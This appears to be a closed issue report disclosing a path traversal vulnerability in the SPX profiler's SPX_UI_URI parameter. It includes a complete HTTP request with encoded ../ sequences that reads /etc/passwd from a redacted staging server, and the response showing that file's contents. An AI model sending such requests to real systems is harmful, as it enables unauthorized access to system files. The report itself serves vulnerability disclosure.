Closed thistehneisen closed 1 month ago
It's possible to retrieve system files through SPX_UI_URI parameter:
SPX_UI_URI
Request:
GET /?SPX_KEY=dev&SPX_UI_URI=%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/2 Host: www.[redacted].staging.[redacted].com Accept-Encoding: gzip, deflate, br Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 Connection: close Cache-Control: max-age=0
Response:
HTTP/2 200 OK Server: nginx Date: Fri, 26 Jul 2024 10:26:11 GMT Content-Type: application/octet-stream Content-Length: 1479 Content-Security-Policy: upgrade-insecure-requests root:x:0:0:root:/root:/bin/bash messagebus:x:499:499:User for D-Bus:/run/dbus:/usr/bin/false nobody:x:65534:65534:nobody:/var/lib/nobody:/bin/bash man:x:13:62:Manual pages viewer:/var/lib/empty:/sbin/nologin lp:x:498:489:Printing daemon:/var/spool/lpd:/sbin/nologin systemd-timesync:x:484:484:systemd Time Synchronization:/:/sbin/nologin systemd-coredump:x:485:485:systemd Core Dumper:/:/sbin/nologin rpc:x:483:65534:user for rpcbind:/var/lib/empty:/sbin/nologin [truncated]
It's possible to retrieve system files through
SPX_UI_URIparameter:Request:
Response: